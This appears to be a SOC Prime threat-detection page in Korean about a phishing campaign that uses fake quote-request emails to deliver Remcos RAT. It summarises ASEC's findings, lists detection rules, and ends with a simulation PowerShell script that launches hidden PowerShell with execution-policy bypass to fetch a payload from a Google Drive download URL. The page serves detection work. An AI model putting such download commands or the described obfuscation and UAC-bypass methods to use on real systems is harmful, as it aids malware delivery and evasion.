SOC Prime Bias: High

05 Oct 2026 16:41 UTC

가짜 견적 요청 이메일을 이용한 악성 소프트웨어 피싱 공격

Author Photo
SOC Prime Team linkedin icon 팔로우
가짜 견적 요청 이메일을 이용한 악성 소프트웨어 피싱 공격
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

요약

위협 행위자들은 악성 payload를 전달하기 위해 프로젝트 견적 요청으로 위장한 피싱 이메일을 배포하고 있습니다. 이 캠페인은 PowerShell 명령을 숨기기 위해 VBScript를 사용하며, 최종적으로 다단계 payload와 Remcos RAT를 수신합니다. 최종 멀웨어는 원격 명령 실행, 키로깅, 손상된 시스템에서의 데이터 탈출을 지원합니다.

조사

안랩 보안 인텔리전스 센터(ASEC)는 압축된 아카이브에 숨겨진 VBScript가 포함된 피싱 캠페인을 발견했습니다. 연구자들은 notepad.exe를 악용하여 ‘powershell’ 실행 파일 이름을 재구성하고 PowerShell 명령을 위한 토큰 기반 문자열 대체에 의존하는 난독화 방법을 발견했습니다. 다단계 payload는 또한 UAC 우회를 수행하기 위해 COM 개체를 활용합니다.

완화

사용자는 발신자의 이메일 도메인을 확인하고 예기치 않은 첨부 파일이나 하이퍼링크를 열 때 주의해야 합니다. 조직은 .vbs, .exe, .js와 같은 의심스러운 파일 확장자를 차단하기 위해 이메일 필터링을 설정해야 합니다. 사용자는 또한 공식적이지 않거나 의심스러운 URL에 민감한 자격 증명을 입력하지 않아야 합니다.

대응

악성 활동이 감지되면 원본 이메일의 합법성을 검증하고 %APPDATA% 내의 의심스러운 파일 활동을 조사하십시오. Remcos RAT와 관련된 무단 PowerShell 실행 및 지표를 확인하십시오. 추가적인 C2 통신, 수평적 활동, 그리고 잠재적 데이터 탈취 방지를 위해 네트워크에서 손상된 시스템을 격리하십시오.

공격 흐름

이 부분은 아직 업데이트 중입니다.

탐지

LOLBAS WScript / CScript (프로세스 생성 통해)

SOC Prime 팀
2026년 10월 1일

타사 서비스/도구를 통한 데이터 유입/유출/명령 및 제어 가능성 (dns_query 통해)

SOC Prime 팀
2026년 10월 1일

타사 서비스/도구를 통한 데이터 유입/유출/명령 및 제어 가능성 (dns 통해)

SOC Prime 팀
2026년 10월 1일

Malware Phishing/Scam 탐지를 위한 IOCs (HashMd5): 견적 요청으로 위장한 피싱 이메일을 조심하세요

SOC Prime AI 규칙
2026년 10월 1일

Malware Phishing/Scam 탐지를 위한 IOCs (SourceIP): 견적 요청으로 위장한 피싱 이메일을 조심하세요

SOC Prime AI 규칙
2026년 10월 1일

Malware Phishing/Scam 탐지를 위한 IOCs (DestinationIP): 견적 요청으로 위장한 피싱 이메일을 조심하세요

SOC Prime AI 규칙
2026년 10월 1일

C2 서버에 연결하는 PowerShell 스크립트 탐지 [Windows 네트워크 연결]

SOC Prime AI 규칙
2026년 10월 1일

VBScript 난독화를 통한 악성 PowerShell 실행 [Windows Powershell]

SOC Prime AI 규칙
2026년 10월 1일

시뮬레이션 실행

  • 공격 서사 및 명령: 공격자는 문서 링크가 포함된 스피어 피싱 이메일을 발송합니다. 사용자가 링크를 클릭하면 Google 드라이브 저장소에서 악성 스크립트를 가져오기 위해 설계된 숨겨진 PowerShell 명령이 실행됩니다. 공격자는 export=download 매개변수를 사용하여 파일이 브라우저에서 보기보다는 직접 다운로드되도록 보장합니다. 목표는 디스크 기반의 안티바이러스를 피하기 위해 메모리에 파일리스 payload를 실행하는 것입니다. 이 명령은 다운로드 패턴을 대상으로 하는 특정 탐지 규칙을 유발하도록 구성됩니다.

  • 회귀 테스트 스크립트:

    # 특정 URL 패턴을 통한 Google 드라이브에서 파일을 다운로드하는 PowerShell 시뮬레이션
    $targetUrl = "https://drive.google.com/uc?export=download&id=1A2B3C4D5E6F7G8H9I0J"
    Start-Process powershell.exe -ArgumentList "-NoProfile -ExecutionPolicy Bypass -Command `"Write-Host 'Downloading payload...'; $data = Invoke-WebRequest -Uri '$targetUrl';`""
  • 정리 명령:

    # 이 특정 시뮬레이션에서는 파일이 디스크에 기록되지 않지만
    # 아직 실행 중이면 프로세스를 중지합니다.
    Stop-Process -Name "powershell" -ErrorAction SilentlyContinue